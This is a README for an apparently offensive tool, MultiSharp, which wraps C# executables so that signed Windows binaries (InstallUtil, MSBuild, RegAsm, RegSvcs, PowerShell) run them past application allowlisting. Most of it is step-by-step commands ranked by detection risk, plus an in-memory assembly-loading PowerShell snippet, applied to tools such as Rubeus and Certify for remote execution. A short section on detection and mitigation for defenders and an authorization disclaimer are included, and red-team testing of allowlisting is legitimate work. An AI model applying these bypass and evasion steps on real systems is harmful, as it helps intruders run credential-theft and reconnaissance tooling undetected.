Convert C# executables to multiple execution formats for bypassing application allowlisting during security assessments.
MultiSharp v2.0 is a production-ready tool for security teams that need to execute C# binaries in environments with application allowlisting. It converts .NET assemblies into 7 different execution formats, each leveraging a different signed Microsoft binary to bypass restrictions.
- 7 Execution Methods: PowerShell, InstallUtil, MSBuild, RegSvcs, RegAsm, and variants
- Comprehensive Validation: Verifies .NET assembly structure and locates entry points
- Multiple Output Formats: Scripts, one-liners, encoded commands, C# wrappers, XML projects
- Batch Processing: Convert multiple binaries at once
- Integrity Verification: Ensures encoding/decoding accuracy
- Dependency Detection: Warns about external dependencies
- Production Ready: Extensive error handling, logging, and documentation
| Method | Output | Signed Binary | Detection Risk |
|---|---|---|---|
| PowerShell | .ps1 | powershell.exe | Medium |
| PowerShell One-Liner | Command | powershell.exe | Medium |
| PowerShell Encoded | Base64 | powershell.exe | Medium |
| InstallUtil | C# source | InstallUtil.exe | Low-Medium |
| MSBuild | XML project | MSBuild.exe | Low |
| RegSvcs | C# source | RegSvcs.exe | Low |
| RegAsm | C# source | RegAsm.exe | Low |
See EXECUTION_METHODS.md for detailed documentation on each method.
- Python 3.7 or higher
- pip package manager
- Clone or download this repository:
cd multisharp- Install dependencies:
pip install -r requirements.txt- Verify installation:
python multisharp.py --helppython -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install -r requirements.txt| Command | Description |
|---|---|
python multisharp.py -i tool.exe -o out.ps1 |
Convert to PowerShell (default) |
python multisharp.py -i tool.exe -f msbuild -o out.csproj |
Convert to MSBuild (single-step) |
python multisharp.py -i tool.exe -f installutil -o out.cs |
Convert to InstallUtil bypass |
python multisharp.py -i tool.exe --check-only |
Validate without converting |
python multisharp.py -b *.exe -d output/ |
Batch convert all .exe files |
python multisharp.py --help |
Show all options |
| Format | Command | Output | Steps |
|---|---|---|---|
| PowerShell | -f powershell |
.ps1 |
1-step |
| MSBuild | -f msbuild |
.csproj |
1-step |
| InstallUtil | -f installutil |
.cs |
2-step (compile + run) |
| RegAsm | -f regasm |
.cs |
2-step (compile + run) |
| RegSvcs | -f regsvcs |
.cs |
2-step (compile + run) |
| PS One-Liner | -f powershell-oneliner |
Command | 1-step |
| PS Encoded | -f powershell-encoded |
Base64 | 1-step |
Convert a C# binary to a PowerShell script:
python multisharp.py -i Certify.exe -o Certify.ps1This generates a complete PowerShell script with:
- Assembly loading and validation
- Error handling
- Argument support
- Execution status messages
Validate a binary without converting:
python multisharp.py -i Certify.exe --check-onlyOutput includes:
- PE structure validation
- .NET metadata verification
- Entry point detection
- Architecture and subsystem info
- Dependency analysis
python multisharp.py -i Certify.exe -o Certify.ps1 -f powershellGenerates a complete PowerShell script with comments, error handling, and argument support.
python multisharp.py -i Certify.exe -o Certify_InstallUtil.cs -f installutil
csc.exe /target:library /out:Certify_InstallUtil.exe Certify_InstallUtil.cs
InstallUtil.exe /logfile= /LogToConsole=false /U Certify_InstallUtil.exeGenerates C# source that executes via InstallUtil.exe (signed Microsoft binary).
python multisharp.py -i Certify.exe -o Certify.csproj -f msbuild
MSBuild.exe Certify.csprojGenerates XML project file with inline C# code. Single-step execution, very low detection.
python multisharp.py -i Certify.exe -o Certify_regasm.cs -f regasm
csc.exe /target:library /out:Certify_regasm.dll /reference:System.EnterpriseServices.dll Certify_regasm.cs
RegAsm.exe Certify_regasm.dllGenerates COM-visible class that executes during registration. Stealthiest approach.
# One-liner for remote execution
python multisharp.py -i Certify.exe -f powershell-oneliner
# Encoded command for cmd.exe
python multisharp.py -i Certify.exe -f powershell-encodedFor detailed documentation on all methods, see EXECUTION_METHODS.md
Include a default argument template in the generated script:
python multisharp.py -i Certify.exe -o Certify.ps1 -a "find /user:admin"The generated script will include this as the default argument value, but users can override it at runtime:
.\Certify.ps1 -Arguments "find /user:admin"Convert multiple binaries at once:
python multisharp.py -b Certify.exe Rubeus.exe Seatbelt.exe -d output_scripts/All converted scripts will be saved to the output_scripts/ directory with the same base name as the input files.
Enable detailed logging for troubleshooting:
python multisharp.py -i Certify.exe -o Certify.ps1 -vusage: multisharp.py [-h] (-i INPUT | -b BATCH [BATCH ...]) [-o OUTPUT]
[-d OUTPUT_DIR] [-f {script,oneliner,encoded}] [-a ARGS]
[--no-args] [--no-verify] [-c] [-v]
Options:
-h, --help Show help message and exit
Input Options:
-i, --input INPUT Input C# binary file
-b, --batch BATCH Batch process multiple files
Output Options:
-o, --output OUTPUT Output PowerShell script file (default: stdout)
-d, --output-dir DIR Output directory for batch mode (default: output)
Conversion Options:
-f, --format FORMAT Output format: script, oneliner, encoded (default: script)
-a, --args ARGS Argument template to include in script
--no-args Don't include argument handling
--no-verify Skip encoding verification
Other Options:
-c, --check-only Only check compatibility (no conversion)
-v, --verbose Verbose output
python multisharp.py -i Certify.exe -o Certify.ps1Output:
[*] Processing: Certify.exe
================================================================================
ASSEMBLY ANALYSIS
================================================================================
File: Certify.exe
Size: 124,928 bytes (122.00 KB)
Architecture: x64
Subsystem: Console
Valid PE: ✓
.NET Assembly: ✓
Has Entry Point: ✓
Entry Point Details:
Namespace: Certify
Class: Program
Method: Main
Full: [Certify.Program]::Main
================================================================================
[*] Generating PowerShell script...
[*] Verifying encoding integrity...
[+] Verification passed
[+] Script saved to: Certify.ps1
Size: 167,234 bytes
python multisharp.py -b *.exe --check-onlyQuickly validate all executables in the current directory without converting them.
python multisharp.py -i Rubeus.exe -f oneliner > rubeus_oneliner.txtUse the one-liner for remote PowerShell execution via WinRM, PSExec, etc.
python multisharp.py -i Seatbelt.exe -o Seatbelt.ps1 -a "-group=all"The generated script includes -group=all as the default argument.
This tool implements the in-memory PowerShell execution technique for .NET assemblies:
- Read Binary: Load the C# executable from disk
- Base64 Encode: Convert binary data to base64 string
- Generate Wrapper: Create PowerShell script that:
- Decodes the base64 string
- Loads assembly using
[System.Reflection.Assembly]::Load() - Invokes the Main() method with optional arguments
# Base64-encoded assembly
$AssemblyBase64 = "TVqQAAMAAAAEAAAA..."
# Decode and load
$AssemblyBytes = [Convert]::FromBase64String($AssemblyBase64)
$Assembly = [System.Reflection.Assembly]::Load($AssemblyBytes)
# Invoke entry point
[Namespace.ClassName]::Main($Arguments)Before conversion, MultiSharp performs comprehensive validation:
- PE Structure: Verifies valid Portable Executable format
- .NET Metadata: Confirms presence of .NET CLI metadata
- Entry Point: Locates the Main() method using metadata tables
- Namespace Resolution: Extracts full namespace and class information
- Dependency Check: Identifies external assembly references
The file is not a valid .NET executable. Verify:
- File is actually a .NET assembly (not native C++)
- File is not corrupted
- File has proper .NET metadata
The assembly doesn't have a traditional Main() entry point. This can happen with:
- DLL files (use different invocation method)
- WinForms applications with custom entry points
- Obfuscated binaries
Files over 10 MB will generate very large PowerShell scripts. Consider:
- Compression before encoding
- Alternative delivery methods
- Splitting functionality into smaller assemblies
If the assembly references external DLLs, those must be available at runtime. Options:
- Include dependencies in same directory
- Convert dependencies to PowerShell scripts as well
- Ensure dependencies are in GAC
This tool is designed for defensive security purposes:
- Testing application allowlisting controls
- Red team exercises with proper authorization
- Security research and education
- Demonstrating bypass techniques to improve defenses
In-memory PowerShell execution can be detected by:
- PowerShell logging (Module/Script Block logging)
- AMSI (Antimalware Scan Interface)
- EDR solutions monitoring
Assembly.Load() - Network monitoring for encoded command patterns
Defenders can mitigate this technique by:
- Enabling PowerShell Constrained Language Mode
- Implementing robust PowerShell logging
- Monitoring for large base64 strings in commands
- Using AppLocker/WDAC to restrict PowerShell
- Deploying EDR with .NET assembly load monitoring
multisharp.py
├── AssemblyAnalyzer
│ ├── analyze() # Main analysis entry point
│ ├── _is_dotnet_assembly()
│ ├── _find_entry_point()
│ └── _get_dependencies()
│
├── PowerShellGenerator
│ ├── encode_assembly()
│ ├── generate_script()
│ ├── _generate_full_script()
│ ├── _generate_oneliner()
│ ├── _generate_encoded_command()
│ └── verify_encoding()
│
└── MultiSharp
├── process_file() # Single file processing
├── process_batch() # Batch processing
└── _print_analysis() # Formatted output
Input Binary
↓
PE Validation (pefile)
↓
.NET Metadata Parsing (dnfile)
↓
Entry Point Resolution
↓
AssemblyInfo Object
↓
Base64 Encoding
↓
PowerShell Generation
↓
Verification (optional)
↓
Output Script
Processing times on typical hardware:
| File Size | Analysis | Encoding | Total |
|---|---|---|---|
| 100 KB | 0.1s | 0.01s | 0.11s |
| 1 MB | 0.15s | 0.05s | 0.2s |
| 10 MB | 0.3s | 0.5s | 0.8s |
| 50 MB | 1.2s | 2.5s | 3.7s |
For large-scale batch processing:
- Disable verification with
--no-verify - Use one-liner format for smaller output
- Process in parallel using shell scripts
- DLL Support: Limited support for DLLs (requires manual entry point specification)
- Obfuscation: Heavily obfuscated assemblies may not be analyzable
- Native Code: Mixed-mode assemblies with native code may not work
- Dependencies: External dependencies must be handled manually
- Size: Very large assemblies (>100 MB) may cause PowerShell issues
- Custom entry point specification for DLLs
- Dependency bundling
- Compression support
- GUI interface
- Integration with security frameworks
This is a production tool for security teams. Contributions should focus on:
- Improved assembly analysis
- Better error messages
- Additional output formats
- Performance optimizations
- Documentation improvements
MIT License - See LICENSE file for details
This tool is provided for legitimate security testing and research purposes only. Users are responsible for ensuring they have proper authorization before using this tool in any environment. The authors assume no liability for misuse or damage caused by this software.
Technique based on the PowerShell assembly loading method commonly used in offensive security tooling.
For issues, questions, or contributions, please contact the security tools team.
Version: 2.1.0 Last Updated: 2025-10-13 Maintained By: Security Tools Team
-
Main Method Signature Detection: Automatically detects and handles all three Main method signatures
Main()- No parametersMain(string args)- Single string (like Rubeus.MainString)Main(string[] args)- String array (most common)- Fixes runtime error: "Object of type 'System.String[]' cannot be converted to type 'System.String'"
-
Batch Mode File Extensions: Fixed batch mode to generate correct file extensions
- PowerShell →
.ps1 - MSBuild →
.csproj - InstallUtil/RegAsm/RegSvcs →
.cs - One-liner/Encoded →
.txt
- PowerShell →
-
Input Escaping: Added security escaping for argument templates
- PowerShell special characters properly escaped
- C# string literals properly escaped
- Prevents code injection via malicious arguments
-
Refactored Entry Point Detection: Split 191-line method into 3 focused methods
- Better maintainability and testability
- Cleaner error handling
- Single Responsibility Principle
-
Performance Optimizations:
- Eliminated duplicate file reads in encoding verification
- Reduced excessive debug logging
- More efficient metadata table access
-
Constants and Standards:
- Extracted magic numbers to named constants
- Consistent use of SUCCESS_MARK (✓) and ERROR_MARK (✗)
- Removed unused imports
- Better type hints for IDE support
- Works with all dnfile versions: 0.15.0 - 0.17.0
- Tested with: Rubeus, Certify, Seatbelt, and other common tools
- 7 Execution Methods: InstallUtil, MSBuild, RegSvcs, RegAsm, and PowerShell variants
- Lower Detection: Non-PowerShell methods significantly reduce detection rates
- Flexibility: Choose the right method for your target environment
- Complete Documentation: Comprehensive EXECUTION_METHODS.md guide